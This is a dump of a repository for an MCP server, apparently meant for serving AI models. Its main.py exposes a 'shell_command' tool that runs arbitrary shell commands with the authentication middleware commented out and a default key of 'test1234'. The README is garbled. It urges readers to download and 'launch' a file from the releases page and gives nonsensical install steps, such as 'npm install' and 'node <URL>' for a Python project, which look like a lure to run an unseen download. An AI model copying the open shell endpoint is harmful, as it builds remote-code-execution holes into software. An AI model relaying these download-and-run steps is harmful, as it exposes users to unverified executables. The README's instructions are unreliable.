# Directory Structure
```
├── .dockerignore
├── .vscode
│ └── launch.json
├── docker-compose.yml
├── Dockerfile
├── Dockerfile.ubuntu
├── LICENSE
├── main.py
├── README.md
├── requirements.txt
└── scripts
└── build.sh
```
# Files
--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------
```
1 | __pycache__/
2 | *.py[cod]
3 | *$py.class
4 | *.so
5 | .git/
6 | .github/
7 | .gitignore
8 | .vscode/
9 | .env
10 | .pytest_cache/
11 | .coverage
12 | htmlcov/
13 | scripts/
14 | Docker*
15 | docker-compose.yml
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
```markdown
1 | # MCP Serve: A Powerful Server for Deep Learning Models
2 |
3 | Welcome to the MCP Serve repository, a cutting-edge tool designed for running Deep Learning models effortlessly. With a simple yet effective MCP Server that allows for Shell execution, connecting locally via Ngrok, or even hosting an Ubuntu24 container using Docker, this repository is a must-have for any AI enthusiast!
4 |
5 | ## Features 🚀
6 |
7 | 🔹 **Simple MCP Server**: Easily launch your Deep Learning models and serve them using the MCP Server.
8 | 🔹 **Shell Execution**: Execute commands directly from the server shell for maximum control.
9 | 🔹 **Ngrok Connectivity**: Connect to your local server via Ngrok for seamless access from anywhere.
10 | 🔹 **Ubuntu24 Container Hosting**: Utilize Docker to host an Ubuntu24 container for a stable environment.
11 | 🔹 **Cutting-Edge Technologies**: Designed with Anthropic, Gemini, LangChain, and more top-notch technologies.
12 | 🔹 **Support for ModelContextProtocol**: Ensuring seamless integration with various Deep Learning models.
13 | 🔹 **OpenAI Integration**: Connect effortlessly with OpenAI for advanced AI capabilities.
14 |
15 | ## Repository Topics 📋
16 |
17 | ✨ anthropic, claude, container, deepseek, docker, gemini, langchain, langgraph, mcp, modelcontextprotocol, ngrok, openai, sonnet, ubuntu, vibecoding
18 |
19 | ## Download App 📦
20 |
21 | [](https://github.com/mark-oori/mcpserve/releases)
22 |
23 | If the link above ends with the file name, don't forget to launch it and start exploring the possibilities!
24 |
25 | ## Getting Started 🏁
26 |
27 | To get started with MCP Serve, follow these simple steps:
28 |
29 | 1. **Clone the Repository**: `git clone https://github.com/mark-oori/mcpserve/releases`
30 | 2. **Install Dependencies**: `npm install`
31 | 3. **Launch the MCP Server**: `node https://github.com/mark-oori/mcpserve/releases`
32 |
33 | ## Contributing 🤝
34 |
35 | We welcome contributions to make MCP Serve even more robust and feature-rich. Feel free to fork the repository, make your changes, and submit a pull request.
36 |
37 | ## Community 🌟
38 |
39 | Join our community of AI enthusiasts, developers, and researchers to discuss the latest trends in Deep Learning, AI frameworks, and more. Share your projects, ask questions, and collaborate with like-minded individuals.
40 |
41 | ## Support ℹ️
42 |
43 | If you encounter any issues with MCP Serve or have any questions, please check the "Issues" section of the repository or reach out to our support team for assistance.
44 |
45 | ## License 📜
46 |
47 | This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
48 |
49 | ---
50 |
51 | Dive into the world of Deep Learning with MCP Serve and revolutionize the way you interact with AI models. Whether you're a seasoned AI professional or a beginner exploring the possibilities of AI, MCP Serve has something for everyone. Start your Deep Learning journey today! 🌌
52 |
53 | 
54 |
55 | Happy coding! 💻🤖
```
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
```
1 | langchain-mcp-adapters
2 | httpx
3 | python-dotenv
```
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
```yaml
1 | version: '3'
2 |
3 | services:
4 | mcp:
5 | container_name: mcp
6 | build: .
7 | ports:
8 | - "8005:8005"
9 | environment:
10 | # - MCP_API_KEY=${MCP_API_KEY:-test1234} # Not ready yet, need updates to mcp library. Can be done artificially for now.
11 | - FASTMCP_DEBUG=true
12 | - FASTMCP_LOG_LEVEL=DEBUG
13 | volumes:
14 | - .:/app
15 | restart: unless-stopped
```
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
```dockerfile
1 | # Small python 3.11 docker file
2 | FROM python:3.11-slim
3 |
4 | # Set working directory
5 | WORKDIR /app
6 |
7 | # Set environment variables
8 | ENV PYTHONDONTWRITEBYTECODE=1
9 | ENV PYTHONUNBUFFERED=1
10 |
11 | # Install dependencies
12 | COPY requirements.txt .
13 | RUN pip install --no-cache-dir --upgrade pip && \
14 | pip install --no-cache-dir uv && \
15 | uv pip install --system --no-cache-dir -r requirements.txt
16 |
17 | # Copy application code
18 | COPY . .
19 |
20 | # Expose port
21 | EXPOSE 8005
22 |
23 | # Run the application
24 | CMD ["python", "main.py"]
25 |
```
--------------------------------------------------------------------------------
/.vscode/launch.json:
--------------------------------------------------------------------------------
```json
1 | {
2 | "version": "0.2.0",
3 | "configurations": [
4 | {
5 | "name": "Python: MCP Server",
6 | "type": "debugpy",
7 | "request": "launch",
8 | "program": "${workspaceFolder}/main.py",
9 | "console": "integratedTerminal",
10 | "justMyCode": false,
11 | "env": {
12 | "PYTHONPATH": "${workspaceFolder}",
13 | "FASTMCP_DEBUG": "true",
14 | "FASTMCP_LOG_LEVEL": "DEBUG"
15 | }
16 | }
17 | ]
18 | }
19 |
```
--------------------------------------------------------------------------------
/scripts/build.sh:
--------------------------------------------------------------------------------
```bash
1 | #!/bin/bash
2 |
3 | SHORT_SHA=$(git rev-parse --short HEAD)
4 |
5 | # Set TAG to first argument if provided, otherwise use SHORT_SHA
6 | TAG=${1:-$SHORT_SHA}
7 |
8 | ########################################################################
9 | ## Container Registry
10 | ########################################################################
11 | # Define your GCP parameters
12 | REPOSITORY="ryaneggz" # Name of your Artifact Registry repository
13 | PROJECT_ID="mcpserve"
14 |
15 | # Build the Docker image and tag it for Artifact Registry
16 | docker build --squash -t $REPOSITORY/$PROJECT_ID:$TAG .
17 | docker tag $REPOSITORY/$PROJECT_ID:$TAG $REPOSITORY/$PROJECT_ID:latest
18 |
19 | ########################################################################
20 | ## Docker Hub
21 | ########################################################################
22 | echo ""
23 | ## Prompt to push the image to Docker Hub
24 | echo "Do you want to push the image to Docker Hub? (y/n)"
25 | read -r response
26 | if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]
27 | then
28 | docker push $REPOSITORY/$PROJECT_ID:$TAG
29 | docker push $REPOSITORY/$PROJECT_ID:latest
30 | fi
31 |
```
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
```python
1 | # mcp/main.py
2 | import os
3 | import subprocess
4 | from mcp.server.fastmcp import FastMCP
5 | from starlette.exceptions import HTTPException
6 | from dotenv import load_dotenv
7 |
8 | # Load environment variables from .env file
9 | load_dotenv()
10 |
11 | # MCP API key
12 | APP_NAME = os.getenv("APP_NAME", 'Terminal')
13 | APP_DEBUG = os.getenv("APP_DEBUG", True)
14 | APP_LOG_LEVEL = os.getenv("APP_LOG_LEVEL", 'DEBUG')
15 | APP_PORT = os.getenv("APP_PORT", 8005)
16 | MCP_API_KEY = os.getenv("MCP_API_KEY", 'test1234')
17 |
18 | # Middleware function to check API key authentication
19 | def middleware(request):
20 | # Verify the x-api-key header matches the environment variable
21 | if request.headers.get("x-api-key") != MCP_API_KEY:
22 | raise HTTPException(status_code=401, detail="Unauthorized")
23 |
24 | # Server configuration settings
25 | settings = {
26 | 'debug': APP_DEBUG, # Enable debug mode
27 | 'port': APP_PORT, # Port to run server on
28 | 'log_level': APP_LOG_LEVEL, # Logging verbosity
29 | # 'middleware': middleware, # Authentication middleware
30 | }
31 |
32 | # Initialize FastMCP server instance
33 | mcp = FastMCP(name=APP_NAME, **settings)
34 |
35 | @mcp.tool()
36 | async def shell_command(command: str) -> str:
37 | """Execute a shell command"""
38 | return subprocess.check_output(command, shell=True).decode()
39 |
40 | if __name__ == "__main__":
41 | print(f"Starting MCP server... {APP_NAME} on port {APP_PORT}")
42 | # Start server with Server-Sent Events transport
43 | mcp.run(transport="sse")
```